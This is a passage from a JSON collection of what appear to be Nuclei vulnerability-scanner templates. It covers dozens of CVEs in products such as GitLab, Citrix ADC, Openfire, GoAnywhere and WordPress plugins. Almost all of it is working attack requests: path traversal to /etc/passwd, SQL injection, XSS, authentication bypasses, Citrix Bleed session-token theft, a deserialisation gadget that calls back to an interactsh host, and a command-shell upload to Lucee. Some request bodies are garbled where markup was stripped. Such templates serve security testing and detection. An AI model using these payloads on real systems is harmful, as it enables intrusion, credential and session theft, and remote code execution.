\".aspx\""]}]}]},{"id":"CVE-2023-29923","info":{"name":"PowerJob <=4.3.2 - Unauthenticated Access","severity":"medium"},"requests":[{"raw":["POST /job/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"appId\":1,\"index\":0,\"pageSize\":10}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"success\":true,\"data\":{\"index\":0,\"pageSize\":10,"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4115","info":{"name":"PHPJabbers Cleaning Business 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFront&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Enquiry summary\", \">\")"],"condition":"and"}]}]},{"id":"CVE-2023-2023","info":{"name":"Custom 404 Pro < 3.7.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=c4p-main&s={{randstr}}%22%20style=animation-name:rotation%20onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")","contains(body_2, \"Custom 404 Pro\")"],"condition":"and"}]}]},{"id":"CVE-2023-2825","info":{"name":"GitLab 16.0.0 - Path Traversal","severity":"high"},"requests":[{"raw":["GET /users/sign_in HTTP/1.1\nHost: {{Hostname}}\n","POST /users/sign_in HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept: */*\n\nuser%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept: */*\n\ngroup%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","@timeout: 15s\nPOST /projects HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nproject%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}\n","POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nX-CSRF-Token: {{x-csrf-token}}\nContent-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6\n\n--0ce2a9fbe06b6da89c138a35a1765ed6\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}\"\n\n{{randstr}}\n--0ce2a9fbe06b6da89c138a35a1765ed6--\n","GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","words":["726f6f743a78"],"encoding":"hex"},{"type":"word","part":"header","words":["application/octet-stream","etc%2Fpasswd"],"condition":"and"}],"extractors":[{"type":"regex","name":"token_1","group":1,"regex":["name=\"authenticity_token\" value=\"([A-Za-z0-9_-]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"token_2","group":1,"regex":["name=\"csrf\\-token\" content=\"([A-Z_0-9a-z-]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"parent_id","group":1,"regex":["href=\"\\/groups\\/new\\?parent_id=([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"namespace_id","group":1,"regex":["ref=\"\\/projects\\/new\\?namespace_id=([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"x-csrf-token","group":1,"regex":["const headers = \\{\"X\\-CSRF\\-Token\":\"([a-zA-Z-0-9_]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"upload-hash","group":1,"regex":["\"url\":\"\\/uploads\\/([0-9a-z]+)\\/"],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-31059","info":{"name":"Repetier Server - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php"],"matchers-condition":"and","matchers":[{"type":"binary","part":"body","binary":["53514C69746520666F726D6174203300"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34020","info":{"name":"Uncanny Toolkit for LearnDash - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/ult/v2/review-banner-visibility&action=maybe-later&redirect=yes&redirect_url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2023-30943","info":{"name":"Moodle - Cross-Site Scripting/Remote Code Execution","severity":"medium"},"requests":[{"raw":["GET /lib/editor/tiny/loader.php?rev=a/../../../../html/pix/f/.png HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /login/index.php HTTP/2\nHost: {{Hostname}}\n","POST /login/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanchor=&logintoken={{token}}&username={{username}}&password={{password}}\n","GET /admin/tool/filetypes/edit.php?name=add HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["",">archive","File icon"],"condition":"and"},{"type":"word","part":"header_4","words":["text/html"]},{"type":"status","part":"header_4","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"token","group":1,"regex":["name=\"logintoken\" value=\"([a-zA-Z0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2023-6875","info":{"name":"WordPress POST SMTP Mailer <= 2.8.7 - Authorization Bypass","severity":"critical"},"requests":[{"raw":["POST /wp-json/post-smtp/v1/connect-app HTTP/1.1\nHost: {{Hostname}}\nAuth-Key: 0\nDevice: {{device}}\nFcm-Token: {{fcm_token}}\nContent-Type: application/x-www-form-urlencoded\n","POST /wp-json/post-smtp/v1/connect-app HTTP/1.1\nHost: {{Hostname}}\nAuth-Key: 0\nDevice: {{device}}\nFcm-Token: {{fcm_token}}\nContent-Type: application/x-www-form-urlencoded\n","GET /wp-json/post-smtp/v1/get-log HTTP/1.1\nHost: {{Hostname}}\nAuth-Key: 0\nDevice: {{device}}\nFcm-Token: {{fcm_token}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_2, \"success\\\":true,\", \"{\\\"fcm_token\\\":\\\"{{fcm_token}}\")","contains_all(body_3, \"true,\\\"data\\\":\", \"access_token=\")"],"condition":"and"}]}]},{"id":"CVE-2023-2648","info":{"name":"Weaver E-Office 9.5 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /inc/jquery/uploadify/uploadify.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"{{file}}.php.\"\nContent-Type: image/jpeg\n\n\n------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\n","POST /attachment/{{name}}/{{file}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","part":"body_2","status":[200]}],"extractors":[{"type":"regex","name":"name","part":"body","group":1,"regex":["([0-9]+)"],"internal":true}]}]},{"id":"CVE-2023-26255","info":{"name":"STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["$textMime"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3345","info":{"name":"LMS by Masteriyo < 1.6.8 - Information Exposure","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/profile.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/masteriyo/v1/users/ HTTP/1.1\nHost: {{Hostname}}\nX-WP-Nonce: {{nonce}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["\"username\":","\"email\":","\"roles\":"],"condition":"and"},{"type":"word","part":"header_3","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"nonce\":\"([a-z0-9]+)\",\"versionString"],"internal":true}]}]},{"id":"CVE-2023-27292","info":{"name":"OpenCATS - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=settings&a=previewPage&url=https://oast.me HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","words":["Page Preview",""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39110","info":{"name":"rConfig 3.9.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=file://localhost/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["root:.*:0:0:"]},{"type":"word","part":"body_1","words":["rConfig"]},{"type":"status","part":"header_3","status":[200]}]}]},{"id":"CVE-2023-0669","info":{"name":"Fortra GoAnywhere MFT - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /goanywhere/lic/accept HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\n\nbundle={{concat(url_encode(base64(aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"Dmmjg5tuz0Vkm4YfSicXG2aHDJVnpBROuvPVL9xAZMo=\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\")))), '$2')}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["GoAnywhere"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-0159","info":{"name":"Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=../wp-config.php\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"status\":\"success\",\"message\":\"Items are loaded\",\"data\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4110","info":{"name":"PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFront&action=pjActionGetBookingForm&session_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Booking\", \"Arrival\", \">\")"],"condition":"and"}]}]},{"id":"CVE-2023-2624","info":{"name":"KiviCare WordPress Plugin - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_weekly_appointment&filterType=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":[" appointment","status\":true"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24488","info":{"name":"Citrix Gateway and Citrix ADC - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E","{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["",""],"condition":"or"},{"type":"word","part":"body","words":["Content-Type: text/html"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-32315","info":{"name":"Openfire Administration Console - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apache","java","openfire","jivesoftware"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27641","info":{"name":"L-Soft LISTSERV 16.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wa.exe?REPORT&z=4&\">a=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[">","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6063","info":{"name":"WP Fastest Cache 1.2.2 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-fastest-cache/readme.txt"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"WP Fastest Cache\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 20s\nGET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nCookie: wordpress_logged_in=\" AND (SELECT 5025 FROM (SELECT(SLEEP(7)))NkcI) AND \"tqKU\"=\"tqKU\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(body, \"/wp-\")"],"condition":"and"}]}]},{"id":"CVE-2023-36306","info":{"name":"Adiscon LogAnalyzer v.4.1.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \">\") && contains(body, \"Adiscon LogAnalyzer\")"],"condition":"and"}]}]},{"id":"CVE-2023-39796","info":{"name":"WBCE 1.6.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /modules/miniform/ajax_delete_message.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code_1 == 200","contains(body, \"Record deleted successfully!\")"],"condition":"and"}]}]},{"id":"CVE-2023-3219","info":{"name":"EventON Lite < 2.1.2 - Arbitrary File Download","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN:VCALENDAR","END:VCALENDAR"],"condition":"and"},{"type":"word","part":"header","words":["text/Calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4966","info":{"name":"Citrix Bleed - Leaking Session Tokens","severity":"high"},"requests":[{"raw":["GET /oauth/idp/.well-known/openid-configuration HTTP/1.1\n{{str}}: {{Hostname}}\nHost: {{payload}}\n\n","POST /logon/LogonPoint/Authentication/GetUserName HTTP/1.1\nHost: {{Hostname}}\nCookie: NSC_AAAC={{session}}\n\n"],"unsafe":true,"extractors":[{"type":"regex","name":"session","part":"body_1","group":1,"regex":["([a-f0-9]{100}45525d5f4f58455e445a4a42)"],"internal":true},{"type":"regex","part":"body_2","regex":["([a-z0-9._]+)"]}],"matchers-condition":"and","matchers":[{"type":"word","words":["NSC_AAAC=","HTTP/1.1"]},{"type":"word","words":["{\"issuer\":"]}]}]},{"id":"CVE-2023-32077","info":{"name":"Netmaker - Hardcoded DNS Secret Key","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/dns"],"headers":{"Authorization":"x secretkey"},"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"application/json\")","contains_all(body, \"{\\\"address\\\":\", \"\\\"network\\\":\", \"\\\"name\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2023-45671","info":{"name":"Frigate < 0.13.0 Beta 3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/%3Cimg%20src=%22%22%20onerror=alert(document.domain)%3E"],"matchers":[{"type":"dsl","dsl":["contains(body, \"Camera named \")","contains(header, \"text/html\")","status_code == 404"],"condition":"and"}]}]},{"id":"CVE-2023-1880","info":{"name":"Phpmyfaq v3.1.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"phpmyfaq\") && contains(body, \"\")","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2023-2224","info":{"name":"Seo By 10Web < 1.2.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wdseo_sitemap HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=wdseo_sitemap&id_message=2 HTTP/1.1\nHost: {{Hostname}}\n\ntask=save&wd_settings%5Bsitemap%5D=1&wd_settings%5Bbing_verification%5D=&wd_settings%5Byandex_verification%5D=&wd_settings%5Bnotify_google%5D=0&wd_settings%5Bnotify_bing%5D=0&wd_settings%5Badditional_pages%5D%5B%5D=&wd_settings%5Badditional_pages%5D%5Bpage_url%5D%5B%5D=%22%3E%3Caudio+src%3Dx+onerror%3Dconfirm%28document.domain%29%3E&wd_settings%5Badditional_pages%5D%5Bpriority%5D%5B%5D=0&wd_settings%5Badditional_pages%5D%5Bfrequency%5D%5B%5D=always&wd_settings%5Badditional_pages%5D%5Blast_changed%5D%5B%5D=&wd_settings%5Bexclude_post_types%5D%5B%5D=&wd_settings%5Bexclude_taxonomies%5D%5B%5D=&wd_settings%5Bexclude_archives%5D%5B%5D=&wd_settings%5Bexclude_posts%5D=&wd_settings%5Bsitemap_image%5D=0&wd_settings%5Bsitemap_video%5D=0&wd_settings%5Bsitemap_stylesheet%5D=1&wd_settings%5Blimit%5D=1000&wd_settings%5Bautoupdate_sitemap%5D=0&nonce_wdseo={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwdseo_sitemap%26id_message%3D1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["value=\"\">
    \\\">
    \n\n\n\n\n
    Command:value=\"#form.cmd#\">
    Options: value=\"#form.opts#\">
    Timeout: value=\"#form.timeout#\"\n value=\"5\">
    \n\n\n\n\n\n\n\n
    \n","POST /lucee/{{randstr}}.cfm HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\ncmd=id&opts=&timeout=5\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-46005","info":{"name":"Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nusername={{username}}&password={{password}}&login=\n","POST /admin/post-avehical.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"vehicletitle\"\n\nTest\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"brandname\"\n\n1\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"vehicalorcview\"\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"priceperday\"\n\n500\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"fueltype\"\n\nPetrol\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"modelyear\"\n\n2022\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"seatingcapacity\"\n\n5\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img1\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img2\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img3\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img4\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img5\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"submit\"\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv--\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40323","info":{"name":"Cobbler <3.3.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n\n\n  find_profile\n  \n    \n      \n        \n          \n            name\n            \n              *\n            \n          \n        \n      \n    \n  \n\n","POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n\n\n  generate_script\n  \n    \n      \n        {{profile}}\n      \n    \n    \n      \n        \n      \n    \n    \n      \n        /etc/passwd\n      \n    \n  \n\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/xml"]},{"type":"regex","regex":["root:.*:0","bin:.*:1","nobody:.*:99"],"condition":"or"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"profile","group":1,"regex":["(.*?)"],"internal":true}]}]},{"id":"CVE-2021-28149","info":{"name":"Hongdian H8922 3.0.5 Devices - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nCache-Control: max-age=0\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n","GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","sshd:[x*]","root:[$]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35323","info":{"name":"Bludit 3.13.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /bludit/admin/login HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 10s\nPOST /bludit/admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntokenCSRF={{tokenCSRF}}&username=admin%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&password=pass&save=\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"\") && contains(body_2, \"Bludit\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"tokenCSRF","part":"body","group":1,"regex":["type=\"hidden\" id=\"jstokenCSRF\" name=\"tokenCSRF\" 